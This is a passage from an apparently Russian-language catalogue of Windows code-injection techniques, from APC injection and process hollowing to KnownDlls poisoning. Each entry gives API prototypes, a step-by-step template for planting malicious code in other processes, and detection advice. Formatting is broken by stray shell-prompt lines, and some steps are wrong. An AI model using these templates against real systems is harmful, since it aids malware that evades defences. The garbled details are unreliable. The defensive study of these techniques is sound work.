- Скопируйте секции в выделенную память
- Обработайте таблицу релокаций:
  - Перечислите записи релокаций
  - Примените релокации на основе нового базового адреса
- Разрешите импорты:
  - Пройдите по каталогу импорта
  - Для каждой импортируемой функции разрешите её адрес с помощью GetProcAddress
  - Запишите разрешённые адреса в IAT
7. Выполните точку входа DLL с помощью одного из методов создания потоков

Обнаружение и защита:
- Реализуйте продвинутые методы сканирования памяти для обнаружения внедрённого кода
- Используйте обнаружение на основе поведения для выявления подозрительных паттернов выделения памяти
- Отслеживайте необычные операции файлового отображения
- Применяйте эвристические методы обнаружения для выявления рефлексивных загрузчиков
## 4. Инъекция APC

Этот метод позволяет выполнять код в конкретном потоке, подключаясь к очереди асинхронных вызовов процедур (APC).  Лучше всего работает с alertable-потоками (теми, которые вызывают функции alertable-ожидания).

Ключевые API:
- [`CreateToolhelp32Snapshot`](https://docs.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-createtoolhelp32snapshot)  ```c
HANDLE CreateToolhelp32Snapshot(
  DWORD dwFlags,
  DWORD th32ProcessID
);
  • Process32First ```c BOOL Process32First( HANDLE hSnapshot, LPPROCESSENTRY32 lppe );
    root@kitploit:~
  • Process32Next ```c BOOL Process32Next( HANDLE hSnapshot, LPPROCESSENTRY32 lppe );
    root@kitploit:~
  • Thread32First ```c BOOL Thread32First( HANDLE hSnapshot, LPTHREADENTRY32 lpte );
    root@kitploit:~
  • Thread32Next ```c BOOL Thread32Next( HANDLE hSnapshot, LPTHREADENTRY32 lpte );
    root@kitploit:~
  • QueueUserAPC ```c DWORD QueueUserAPC( PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData );
    root@kitploit:~

Template:

  1. Создайте снимок системных процессов с помощью CreateToolhelp32Snapshot
  2. Перечислите процессы и потоки, используя Process32First, Process32Next, Thread32First и Thread32Next
  3. Откройте целевой процесс с помощью OpenProcess
  4. Выделите память в целевом процессе с помощью VirtualAllocEx
  5. Запишите вредоносный код в выделенную память с помощью WriteProcessMemory
  6. Поставьте APC в очередь для целевого потока с помощью QueueUserAPC, указывающего на внедрённый код

Обнаружение и защита:

  • Отслеживайте подозрительные операции постановки APC в очередь
  • Внедрите мониторинг выполнения потоков для обнаружения неожиданного выполнения кода
  • Используйте EDR-решения с возможностями обнаружения злоупотребления APC
  • Применяйте анализ во время выполнения для выявления необычного поведения потоков

5. Process Hollowing (замена процесса)

Эта техника «опустошает» всё содержимое процесса и вставляет в него вредоносное содержимое.

Ключевые API:

  • CreateProcess ```c BOOL CreateProcessA( LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );
    root@kitploit:~

NtQueryInformationProcess (Недокументированный) ```c NTSTATUS NTAPI NtQueryInformationProcess( IN HANDLE ProcessHandle, IN PROCESSINFOCLASS ProcessInformationClass, OUT PVOID ProcessInformation, IN ULONG ProcessInformationLength, OUT PULONG ReturnLength OPTIONAL );

root@kitploit:~
- [`GetModuleHandle`](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getmodulehandlea)  ```c
HMODULE GetModuleHandleA(
  LPCSTR lpModuleName
);
  • ZwUnmapViewOfSection / NtUnmapViewOfSection (Недокументированный) ```c NTSTATUS NTAPI NtUnmapViewOfSection( IN HANDLE ProcessHandle, IN PVOID BaseAddress );
    root@kitploit:~
  • VirtualAllocEx (см. выше)
  • WriteProcessMemory (см. выше)
  • GetThreadContext ```c BOOL GetThreadContext( HANDLE hThread, LPCONTEXT lpContext );
    root@kitploit:~
  • SetThreadContext (см. выше)
  • ResumeThread (см. выше)

Template:

  1. Создайте новый процесс в приостановленном состоянии, используя CreateProcess с флагом CREATE_SUSPENDED
  2. Получите информацию о процессе с помощью NtQueryInformationProcess
  3. Удалите исходный исполняемый файл из процесса с помощью NtUnmapViewOfSection; после удаления исходного исполняемого файла измените базовый адрес образа в PEB (блок окружения процесса), чтобы он указывал на новую выделенную память.
  4. Измените базовый адрес образа в PEB:
  • Используйте ReadProcessMemory для чтения PEB
  • Найдите поле ImageBaseAddress
  • Используйте WriteProcessMemory, чтобы обновить его адресом новой выделенной памяти
  1. Выделите память в целевом процессе с помощью VirtualAllocEx
  2. Запишите вредоносный исполняемый файл в выделенную память с помощью WriteProcessMemory
  3. Обновите контекст потока, чтобы он указывал на новую точку входа, используя GetThreadContext и SetThreadContext
  4. Возобновите основной поток процесса с помощью ResumeThread

Обнаружение и защита:

  • Реализуйте проверки целостности процессов для обнаружения подменённых процессов
  • Отслеживайте подозрительные паттерны создания процессов, особенно с флагом CREATE_SUSPENDED
  • Используйте инструменты криминалистического анализа памяти для выявления признаков подмены образа процесса
  • Применяйте поведенческий анализ для обнаружения процессов с неожиданной компоновкой памяти

6. AtomBombing

Вариант внедрения APC, который работает путем разделения вредоносной полезной нагрузки на отдельные строки и использования атомов. Эта техника основана на том, что атомы являются общими для всех процессов.

Ключевые API:

  • OpenThread (см. выше)
  • GlobalAddAtom ```c ATOM GlobalAddAtomA( LPCSTR lpString );
    root@kitploit:~
  • GlobalGetAtomName ```c UINT GlobalGetAtomNameA( ATOM nAtom, LPSTR lpBuffer, int nSize );
    root@kitploit:~
  • QueueUserAPC (см. выше)
  • NtQueueApcThread (Недокументированный, см. выше)
  • NtSetContextThread (Недокументированный) ```c NTSTATUS NTAPI NtSetContextThread( IN HANDLE ThreadHandle, IN PCONTEXT ThreadContext );
    root@kitploit:~

Template:

  1. Разделите вредоносную полезную нагрузку на небольшие фрагменты
  2. Для каждого фрагмента используйте GlobalAddAtom для создания глобального атома
  3. Откройте целевой поток с помощью OpenThread
  4. Поставьте в очередь APC для целевого потока с помощью QueueUserAPC или NtQueueApcThread
  5. В процедуре APC используйте GlobalGetAtomName для получения фрагментов полезной нагрузки
  6. Соберите полезную нагрузку в памяти целевого процесса
  7. Выполните полезную нагрузку с помощью NtSetContextThread или поставив в очередь ещё один APC

Обнаружение и защита:

  • Отслеживайте необычные паттерны создания и получения атомов
  • Внедрите поведенческое обнаружение для процессов, обращающихся к большому количеству атомов
  • Используйте EDR-решения с возможностями обнаружения техники AtomBombing
  • Применяйте анализ во время выполнения для выявления подозрительного использования APC в сочетании с манипуляцией атомами

7. Process Doppelgänging

Эволюция Process Hollowing, которая заменяет образ до создания процесса. Эта техника использует Windows Transactional NTFS (TxF) для временной замены легитимного файла вредоносным в процессе создания процесса.

Ключевые API:

  • CreateTransaction ```c HANDLE CreateTransaction( LPSECURITY_ATTRIBUTES lpTransactionAttributes, LPGUID UOW, DWORD CreateOptions, DWORD IsolationLevel, DWORD IsolationFlags, DWORD Timeout, LPWSTR Description );
    root@kitploit:~

CreateFileTransacted ```c HANDLE CreateFileTransactedA( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile, HANDLE hTransaction, PUSHORT pusMiniVersion, PVOID lpExtendedParameter );

root@kitploit:~
- `NtCreateSection` (недокументированная)  ```c
NTSTATUS NTAPI NtCreateSection(
  OUT PHANDLE SectionHandle,
  IN ACCESS_MASK DesiredAccess,
  IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
  IN PLARGE_INTEGER MaximumSize OPTIONAL,
  IN ULONG SectionPageProtection,
  IN ULONG AllocationAttributes,
  IN HANDLE FileHandle OPTIONAL
);
  • NtCreateProcessEx (недокументированный) ```c NTSTATUS NTAPI NtCreateProcessEx( OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ParentProcess, IN ULONG Flags, IN HANDLE SectionHandle OPTIONAL, IN HANDLE DebugPort OPTIONAL, IN HANDLE ExceptionPort OPTIONAL, IN BOOLEAN InJob );
    root@kitploit:~
  • NtQueryInformationProcess (Недокументированный, см. выше)
  • NtCreateThreadEx (Недокументированный) ```c NTSTATUS NTAPI NtCreateThreadEx( OUT PHANDLE ThreadHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ProcessHandle, IN PVOID StartRoutine, IN PVOID Argument OPTIONAL, IN ULONG CreateFlags, IN SIZE_T ZeroBits, IN SIZE_T StackSize, IN SIZE_T MaximumStackSize, IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL );
    root@kitploit:~
  • RollbackTransaction ```c BOOL RollbackTransaction( HANDLE TransactionHandle );
    root@kitploit:~

Template:

  1. Создайте транзакцию с помощью CreateTransaction
  2. Создайте транзакционный файл с помощью CreateFileTransacted
  3. Запишите вредоносную полезную нагрузку в транзакционный файл
  4. Создайте секцию для транзакционного файла с помощью NtCreateSection
  5. Создайте процесс из секции с помощью NtCreateProcessEx
  6. Создайте поток в новом процессе с помощью NtCreateThreadEx
  7. Откатите транзакцию с помощью RollbackTransaction, чтобы удалить следы вредоносного файла

Обнаружение и защита:

  • Отслеживайте подозрительные транзакционные операции NTFS
  • Внедрите мониторинг целостности файлов для обнаружения временных замен файлов
  • Используйте продвинутые EDR-решения, способные обнаруживать техники Process Doppelgänging
  • Применяйте обнаружение на основе поведения для выявления процессов, созданных из транзакционных файлов

8. Process Herpaderping

Похожа на Process Doppelgänging, но использует порядок создания процесса и проверок безопасности. Эта техника использует тот факт, что Windows выполняет проверки безопасности исполняемого файла до того, как начнёт выполнять процесс.

Ключевые API:

  • CreateFile ```c HANDLE CreateFileA( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile );
    root@kitploit:~
  • NtCreateSection (Незадокументировано, см. выше)
  • NtCreateProcessEx (Незадокументировано, см. выше)
  • NtCreateThreadEx (Незадокументировано, см. выше)

Шаблон:

  1. Создайте файл с помощью CreateFile
  2. Запишите вредоносную нагрузку в файл
  3. Создайте секцию для файла с помощью NtCreateSection
  4. Перезапишите содержимое файла безвредными данными
  5. Создайте процесс из секции с помощью NtCreateProcessEx
  6. Создайте поток в новом процессе с помощью NtCreateThreadEx

Обнаружение и защита:

  • Внедрите мониторинг целостности файлов для обнаружения быстрых изменений в исполняемых файлах
  • Используйте поведенческий анализ для выявления процессов с несоответствующим содержимым файлов
  • Применяйте современные EDR-решения, способные обнаруживать техники Process Herpaderping
  • Отслеживайте подозрительные паттерны создания, изменения файлов и создания процессов

9. Внедрение через хуки

Эта техника использует функции, связанные с хуками, для внедрения вредоносной DLL. Эта техника также может использоваться для перехвата API, а не только для инъекций.

Ключевые API:

  • SetWindowsHookEx ```c HHOOK SetWindowsHookExA( int idHook, HOOKPROC lpfn, HINSTANCE hmod, DWORD dwThreadId );
    root@kitploit:~
  • PostThreadMessage ```c BOOL PostThreadMessageA( DWORD idThread, UINT Msg, WPARAM wParam, LPARAM lParam );
    root@kitploit:~

Шаблон:

  1. Создайте DLL, содержащую процедуру хука
  2. Используйте SetWindowsHookEx для установки хука в целевой процесс
  3. Вызовите хук, отправив сообщение через PostThreadMessage

Обнаружение и защита:

  • Отслеживайте подозрительное использование SetWindowsHookEx, особенно глобальных хуков
  • Внедряйте механизмы обнаружения перехвата API
  • Используйте EDR-решения с возможностями обнаружения аномальных установок хуков
  • Применяйте поведенческий анализ для выявления процессов с неожиданными загруженными модулями

10. Внедрение в дополнительную память Windows

Эта техника внедряет код в процесс с использованием дополнительной памяти Windows (EWM), которая добавляется к экземпляру класса при регистрации класса окна. Менее распространена и может быть обнаружена некоторыми решениями безопасности.

Ключевые API:

  • FindWindowA ```c HWND FindWindowA( LPCSTR lpClassName, LPCSTR lpWindowName );
    root@kitploit:~

GetWindowThreadProcessId ```c DWORD GetWindowThreadProcessId( HWND hWnd, LPDWORD lpdwProcessId );

root@kitploit:~
- `OpenProcess` (см. выше)
- `VirtualAllocEx` (см. выше)
- `WriteProcessMemory` (см. выше)
- [`SetWindowLongPtrA`](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowlongptra)  ```c
LONG_PTR SetWindowLongPtrA(
  HWND     hWnd,
  int      nIndex,
  LONG_PTR dwNewLong
);
  • SendNotifyMessage ```c BOOL SendNotifyMessageA( HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam );
    root@kitploit:~

Шаблон:

  1. Найдите целевое окно с помощью FindWindowA
  2. Получите идентификатор процесса окна с помощью GetWindowThreadProcessId
  3. Откройте процесс с помощью OpenProcess
  4. Выделите память в целевом процессе с помощью VirtualAllocEx
  5. Запишите вредоносный код в выделенную память с помощью WriteProcessMemory
  6. Используйте SetWindowLongPtrA для изменения дополнительной памяти окна
  7. Запустите выполнение с помощью SendNotifyMessage

Обнаружение и защита:

  • Отслеживайте подозрительные изменения свойств окон
  • Внедряйте проверки целостности данных класса окна
  • Используйте EDR-решения с возможностями обнаружения манипуляций EWM
  • Применяйте поведенческий анализ для выявления процессов с неожиданными изменениями свойств окон

11. Распространение инъекции

Этот метод используется для внедрения вредоносного кода в процессы со средним уровнем целостности, такие как explorer.exe. Он работает путем перечисления окон и создания их подклассов. Может быть особенно эффективным для повышения привилегий.

Ключевые API:

  • EnumWindows ```c BOOL EnumWindows( WNDENUMPROC lpEnumFunc, LPARAM lParam );
    root@kitploit:~
  • EnumChildWindows ```c BOOL EnumChildWindows( HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam );
    root@kitploit:~
  • EnumProps ```c int EnumPropsA( HWND hWnd, PROPENUMPROCA lpEnumFunc );
    root@kitploit:~
  • GetProp ```c HANDLE GetPropA( HWND hWnd, LPCSTR lpString );
    root@kitploit:~
  • SetWindowSubclass ```c BOOL SetWindowSubclass( HWND hWnd, SUBCLASSPROC pfnSubclass, UINT_PTR uIdSubclass, DWORD_PTR dwRefData );
    root@kitploit:~

Template:

  1. Перечислите окна с помощью EnumWindows и EnumChildWindows
  2. Для каждого окна проверьте наличие подклассовых окон с помощью EnumProps и GetProp
  3. Откройте целевой процесс с помощью OpenProcess
  4. Выделите память в целевом процессе с помощью VirtualAllocEx
  5. Запишите вредоносный код в выделенную память с помощью WriteProcessMemory
  6. Создайте подкласс окна, используя SetWindowSubclass
  7. Установите новое свойство с помощью SetPropA для хранения полезной нагрузки
  8. Запустите выполнение, отправив сообщение с помощью PostMessage

Обнаружение и защита:

  • Отслеживайте подозрительные шаблоны перечисления окон и создания подклассов
  • Внедрите проверки целостности для создания подклассов окон
  • Используйте EDR-решения с возможностями обнаружения методов распространения инъекций
  • Применяйте поведенческий анализ для выявления процессов с неожиданными изменениями в подклассах окон

12. Распыление кучи

Хотя это не является строго техникой инъекции, распыление кучи часто используется в сочетании с другими методами инъекций для облегчения доставки эксплойт-нагрузки. Современные браузеры и операционные системы реализовали меры защиты от этого.

Ключевые API:

  • HeapAlloc ```c LPVOID HeapAlloc( HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes );
    root@kitploit:~
  • VirtualAlloc ```c LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
    root@kitploit:~

Template:

  1. Выделите несколько блоков памяти с помощью HeapAlloc или VirtualAlloc
  2. Заполните эти блоки комбинацией NOP-слейдов и полезной нагрузки
  3. Повторите этот процесс, чтобы покрыть большую часть адресного пространства процесса

Обнаружение и защита:

  • Внедрите мониторинг выделения памяти для обнаружения подозрительных паттернов
  • Используйте рандомизацию компоновки адресного пространства (ASLR) для снижения риска атак heap spraying
  • Применяйте EDR-решения с возможностями обнаружения техник heap spraying
  • Внедряйте браузерные меры защиты, например рандомизацию выделения кучи

13. Перехват выполнения потока

Эта техника предполагает приостановку легитимного потока в целевом процессе, изменение его контекста выполнения для указания на вредоносный код и последующее возобновление потока. Сохранение и восстановление исходного контекста потока необходимо для поддержания стабильности процесса.

Ключевые API:

  • OpenThread (см. выше)
  • SuspendThread (см. выше)
  • GetThreadContext (см. выше)
  • SetThreadContext (см. выше)
  • VirtualAllocEx (см. выше)
  • WriteProcessMemory (см. выше)
  • ResumeThread (см. выше)

Шаблон:

  1. Откройте целевой поток с помощью OpenThread
  2. Приостановите поток с помощью SuspendThread
  3. Получите контекст потока с помощью GetThreadContext
  4. Выделите память в целевом процессе с помощью VirtualAllocEx
  5. Запишите вредоносный код в выделенную память с помощью WriteProcessMemory
  6. Измените контекст потока, чтобы он указывал на внедрённый код, с помощью SetThreadContext
  7. Возобновите поток с помощью ResumeThread

Обнаружение и защита:

  • Отслеживайте подозрительные паттерны приостановки и возобновления потоков
  • Внедрите мониторинг выполнения потоков для обнаружения неожиданных изменений в потоке выполнения
  • Используйте EDR-решения с возможностями обнаружения техник перехвата потоков
  • Применяйте анализ в реальном времени для выявления необычного поведения потоков

14. Затирание модуля

Эта техника перезаписывает память легитимного модуля в целевом процессе вредоносным кодом, потенциально обходя некоторые проверки безопасности, но обнаруживается проверками целостности загруженных модулей.

Ключевые API:

  • GetModuleInformation ```c BOOL GetModuleInformation( HANDLE hProcess, HMODULE hModule, LPMODULEINFO lpmodinfo, DWORD cb );
    root@kitploit:~
  • VirtualProtectEx ```c BOOL VirtualProtectEx( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
    root@kitploit:~
  • WriteProcessMemory (см. выше)

Template:

  1. Откройте целевой процесс с помощью OpenProcess
  2. Получите информацию о целевом модуле с помощью GetModuleInformation
  3. Измените защиту памяти модуля на доступную для записи с помощью VirtualProtectEx
  4. Перезапишите секцию кода модуля вредоносным кодом с помощью WriteProcessMemory
  5. Восстановите исходную защиту памяти с помощью VirtualProtectEx

Обнаружение и защита:

  • Реализуйте проверки целостности модулей для обнаружения изменений загруженных модулей
  • Используйте EDR-решения с возможностями обнаружения техник module stomping
  • Применяйте инструменты анализа памяти для выявления признаков module stomping
  • Внедрите механизмы подписи кода и проверки для загруженных модулей

15. Перехват IAT

Эта техника изменяет таблицу адресов импорта (IAT) процесса, чтобы перенаправлять вызовы функций на вредоносный код. Обнаруживается путем сравнения записей IAT с фактическими адресами функций в целевых DLL.

Ключевые API:

  • GetProcAddress ```c FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName );
    root@kitploit:~
  • VirtualProtect ```c BOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
    root@kitploit:~

Шаблон:

  1. Найдите IAT целевого процесса
  2. Определите функцию, которую нужно перехватить
  3. Измените защиту памяти IAT на доступную для записи с помощью VirtualProtect
  4. Замените исходный адрес функции адресом вредоносной функции
  • Вычислите адрес записи IAT для целевой функции
  • Прочитайте исходный адрес функции из записи IAT
  • Замените исходный адрес функции адресом вредоносной функции
  1. Восстановите исходную защиту памяти

Обнаружение и защита:

  • Внедрите проверки целостности IAT для обнаружения изменений
  • Используйте EDR-решения с возможностями обнаружения перехвата IAT
  • Применяйте анализ во время выполнения для выявления непредвиденных перенаправлений функций
  • Внедряйте механизмы подписи кода и проверки загруженных модулей

16. Инлайн-хукинг

Эта техника изменяет первые несколько инструкций функции, чтобы перенаправить выполнение на вредоносный код. Требует осторожной обработки многобайтовых инструкций и относительных переходов.

Ключевые API:

  • VirtualProtect (см. выше)
  • memcpy ```c void *memcpy( void *dest, const void *src, size_t count );
    root@kitploit:~

Шаблон:

  1. Найдите целевую функцию в памяти
  2. Измените защиту памяти на доступную для записи с помощью VirtualProtect
  3. Сохраните исходные инструкции (обычно 5 или более байт)
  4. Перезапишите начало функции переходом на вредоносный код
  5. Во вредоносном коде выполните сохранённые исходные инструкции, а затем вернитесь к исходной функции

Обнаружение и защита:

  • Внедрите проверки целостности функций для обнаружения изменений в прологах функций
  • Используйте EDR-решения с возможностями обнаружения инлайн-хуков
  • Применяйте анализ времени выполнения для выявления неожиданных изменений в потоке выполнения функций
  • Внедрите механизмы подписи кода и проверки загружаемых модулей

17. Инъекция через отладчик

Эта техника использует отладочные API для внедрения кода в целевой процесс. Может быть обнаружена проверками анти-отладки в целевом процессе.

Ключевые API:

  • DebugActiveProcess ```c BOOL DebugActiveProcess( DWORD dwProcessId );
    root@kitploit:~
  • WaitForDebugEvent ```c BOOL WaitForDebugEvent( LPDEBUG_EVENT lpDebugEvent, DWORD dwMilliseconds );
    root@kitploit:~

ContinueDebugEvent ```c BOOL ContinueDebugEvent( DWORD dwProcessId, DWORD dwThreadId, DWORD dwContinueStatus );

root@kitploit:~
Шаблон:
1. Подключиться к целевой групповой программе (процессу) в качестве отладчика с помощью `DebugActiveProcess`
2. Ожидать события отладки с помощью `WaitForDebugEvent`
3. Когда произойдёт подходящее событие, внедрить вредоносный код с помощью `WriteProcessMemory`
4. Изменить контекст потока, чтобы выполнить внедрённый код
5. Продолжить обработку события отладки с помощью `ContinueDebugEvent`

Обнаружение и защита:
- Применяйте методы защиты от отладки (анти-отладки) в чувствительных приложениях
- Отслеживайте подозрительное использование отладочных API
- Используйте EDR-решения с возможностями обнаружения внедрения на основе отладчика
- Применяйте анализ во время выполнения для выявления неожиданных событий отладки

## 18. Перехват COM (COM Hijacking)

Этот метод заключается в замене легитимных COM-объектов вредоносными для выполнения кода при создании экземпляра COM-объекта. Используется для обеспечения устойчивости (persistence), а не только для внедрения.

Ключевые API:
- [`CoCreateInstance`](https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cocreateinstance)  ```c
HRESULT CoCreateInstance(
  REFCLSID rclsid,
  LPUNKNOWN pUnkOuter,
  DWORD dwClsContext,
  REFIID riid,
  LPVOID *ppv
);
  • RegOverridePredefKey ```c LSTATUS RegOverridePredefKey( HKEY hKey, HKEY hNewHKey );
    root@kitploit:~

Шаблон:

  1. Создайте вредоносный COM-объект
  2. Измените реестр, чтобы заменить CLSID легитимного COM-объекта на вредоносный
  3. Когда приложение вызывает CoCreateInstance, вместо легитимного будет создан вредоносный объект

Обнаружение и защита:

  • Внедрите проверки целостности COM-объектов
  • Отслеживайте подозрительные изменения реестра, связанные с COM-объектами
  • Используйте список разрешённых приложений (application whitelisting), чтобы предотвратить загрузку неавторизованных COM-объектов
  • Применяйте поведенческий анализ для выявления неожиданного создания экземпляров COM-объектов

19. Phantom DLL Hollowing

Этот метод заключается в создании новой секции в легитимной DLL и внедрении в неё кода.

Ключевые API:

  • LoadLibraryEx ```c HMODULE LoadLibraryExA( LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags );
    root@kitploit:~
  • VirtualAlloc ```c LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
    root@kitploit:~
  • VirtualProtect ```c BOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
    root@kitploit:~

Template:

  1. Загрузите легитимную DLL с помощью LoadLibraryEx с флагом DONT_RESOLVE_DLL_REFERENCES
  2. Выделите новый раздел памяти с помощью VirtualAlloc
  3. Скопируйте вредоносный код в новый раздел
  4. Измените PE-заголовки DLL, чтобы включить новый раздел
  5. Измените защиту памяти нового раздела с помощью VirtualProtect
  6. Выполните внедрённый код

Обнаружение и защита:

  • Внедряйте проверки целостности DLL для обнаружения модификаций
  • Отслеживайте подозрительные паттерны загрузки DLL и выделения памяти
  • Используйте EDR-решения с возможностями обнаружения phantom DLL hollowing
  • Применяйте инструменты анализа памяти для выявления признаков манипуляций с DLL

20. PROPagate

Эта техника злоупотребляет функциями Windows API SetProp/GetProp для достижения выполнения кода.

Ключевые API:

  • SetProp ```c BOOL SetPropA( HWND hWnd, LPCSTR lpString, HANDLE hData );
    root@kitploit:~
  • GetProp ```c HANDLE GetPropA( HWND hWnd, LPCSTR lpString );
    root@kitploit:~
  • EnumPropsEx ```c int EnumPropsExW( HWND hWnd, PROPENUMPROCEXW lpEnumFunc, LPARAM lParam );
    root@kitploit:~

Template:

  1. Найдите целевое окно с помощью FindWindow или EnumWindows
  2. Выделите память для полезной нагрузки с помощью VirtualAllocEx
  3. Запишите полезную нагрузку в выделенную память с помощью WriteProcessMemory
  4. Используйте SetProp, чтобы задать свойство окна, указав адрес полезной нагрузки в качестве значения свойства
  • Создайте пользовательскую оконную процедуру, которая выполняет полезную нагрузку
  • Используйте SetWindowLongPtr, чтобы заменить исходную оконную процедуру пользовательской
  1. Запустите выполнение, вызвав перечисление свойств окна (например, отправив сообщение, которое вызывает перерисовку)

Обнаружение и защита:

  • Отслеживайте подозрительные изменения свойств окна
  • Внедрите проверки целостности свойств окна
  • Используйте EDR-решения с возможностями обнаружения техник PROPagate
  • Применяйте поведенческий анализ для выявления процессов с неожиданными изменениями свойств окна

21. Инъекция Early Bird

Эта техника внедряет код в процесс во время его инициализации, до того как начнёт выполняться основной поток.

Ключевые API:

  • CreateProcess ```c BOOL CreateProcessA( LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );
    root@kitploit:~
  • VirtualAllocEx (см. выше)
  • WriteProcessMemory (см. выше)
  • QueueUserAPC (см. выше)
  • ResumeThread (см. выше)

Шаблон:

  1. Создайте новый процесс в приостановленном состоянии, используя CreateProcess с флагом CREATE_SUSPENDED
  2. Выделите память в новом процессе с помощью VirtualAllocEx
  3. Запишите полезную нагрузку в выделенную память с помощью WriteProcessMemory
  4. Поставьте APC в очередь основному потоку с помощью QueueUserAPC, указывая на полезную нагрузку
  5. Возобновите основной поток с помощью ResumeThread

Обнаружение и защита:

  • Отслеживайте создание процессов с флагом CREATE_SUSPENDED
  • Внедрите мониторинг инициализации процессов для обнаружения неожиданного выполнения кода
  • Используйте EDR-решения с возможностями обнаружения техники Early Bird injection
  • Применяйте поведенческий анализ для выявления процессов с аномальными паттернами инициализации

22. Инъекция на основе Shim

Эта техника использует инфраструктуру совместимости приложений Windows для внедрения кода.

Ключевые API:

  • SdbCreateDatabase ```c PDB SdbCreateDatabase( LPCWSTR pwszPath );
    root@kitploit:~
  • SdbWriteDWORDTag ```c BOOL SdbWriteDWORDTag( PDB pdb, TAG tTag, DWORD dwData );
    root@kitploit:~
  • SdbEndWriteListTag ```c BOOL SdbEndWriteListTag( PDB pdb, TAG tTag );
    root@kitploit:~

Шаблон:

  1. Создайте базу данных шаймов с помощью SdbCreateDatabase
  2. Запишите данные шайма в базу данных, включая полезную нагрузку и целевое приложение
  3. Установите базу данных шаймов с помощью sdbinst.exe
  4. Полезная нагрузка будет выполнена при запуске целевого приложения

Обнаружение и защита:

  • Отслеживайте подозрительное создание и установку баз данных шаймов
  • Внедрите мониторинг шаймов совместимости приложений
  • Используйте EDR-решения с возможностями обнаружения техник инъекций на основе шаймов
  • Применяйте белые списки для одобренных шаймов и блокируйте несанкционированную установку шаймов

23. Инъекция через отображаемые в память файлы

Эта техника использует файлы, отображаемые в память, для внедрения кода в удалённый процесс.

Ключевые API:

  • CreateFileMapping ```c HANDLE CreateFileMappingA( HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName );
    root@kitploit:~
  • MapViewOfFile ```c LPVOID MapViewOfFile( HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap );
    root@kitploit:~
  • NtMapViewOfSection (недокументированная) ```c NTSTATUS NTAPI NtMapViewOfSection( HANDLE SectionHandle, HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect );
    root@kitploit:~

Template:

  1. Создайте объект сопоставления файла с помощью CreateFileMapping
  2. Отобразите представление файла в текущем процессе с помощью MapViewOfFile
  3. Запишите полезную нагрузку в сопоставленное представление
  4. Используйте NtMapViewOfSection для отображения представления в целевом процессе
  5. Выполните полезную нагрузку в целевом процессе

Обнаружение и защита:

  • Отслеживайте подозрительные паттерны создания файловых сопоставлений и представлений
  • Реализуйте мониторинг сопоставления памяти для обнаружения неожиданного использования общей памяти
  • Используйте EDR-решения с возможностями обнаружения техник внедрения через сопоставление
  • Применяйте поведенческий анализ для выявления процессов с аномальным использованием файлов, отображаемых в память

24. Отравление кэша KnownDlls

Эта техника заключается в замене легитимной DLL в кэше KnownDlls на вредоносную.

Ключевые API:

  • NtSetSystemInformation (Недокументированный) ```c NTSTATUS NTAPI NtSetSystemInformation( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength );
    root@kitploit:~

Template:

  1. Создайте вредоносную DLL с тем же именем, что и легитимная запись KnownDlls
  2. Создайте объект Section для вредоносной DLL:
    • Используйте NtCreateSection для создания объекта section
    • Сопоставьте представление section с памятью
    • Запишите содержимое вредоносной DLL в сопоставленное представление
  3. Используйте NtSetSystemInformation с SystemExtendServiceTableInformation, чтобы добавить вредоносную DLL в кэш KnownDlls
  4. Процессы загрузят вредоносную DLL вместо легитимной

Обнаружение и защита:

  • Реализуйте проверки целостности KnownDlls
